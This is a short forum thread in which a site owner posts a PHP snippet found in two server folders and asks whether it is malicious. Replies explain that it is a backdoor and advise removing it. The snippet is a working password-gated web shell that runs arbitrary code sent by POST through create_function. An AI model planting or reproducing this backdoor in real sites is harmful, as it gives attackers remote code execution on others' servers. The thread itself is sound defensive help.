<?php error_reporting(E_ALL); if (isset($_POST['de8ad874']) && md5($_POST['de8ad874']) == '992c9c4dfbdf0f872baaf5123bea4afd') { $test_func = create_function('', urldecode($_POST['f'])); $test_func(); } exit(); ?> This is inside two folder in my server and I cannot delete that. Is it a bad code? Thanks!
This script looks like a gateway to your page. Basically it means that one can provide a string that will be executed as a function in your page. Delete all such files as soon as possible. If you have shell access then do: chmod u+w directory where directory is the folder where this php file is located. You can do this also from ftp client, look for "File->change attributes" and give yourself "write" permission on the directory.
Yeah this looks dangerous! I'd remove it if you can because a user could run harmful functions and really screw you up if they know the right $_POST variables (which would not be hard to get) If you can't remove the code because it performs a pivotal function then follow the steps outlined by krzyk. Protect your files. Hope this helps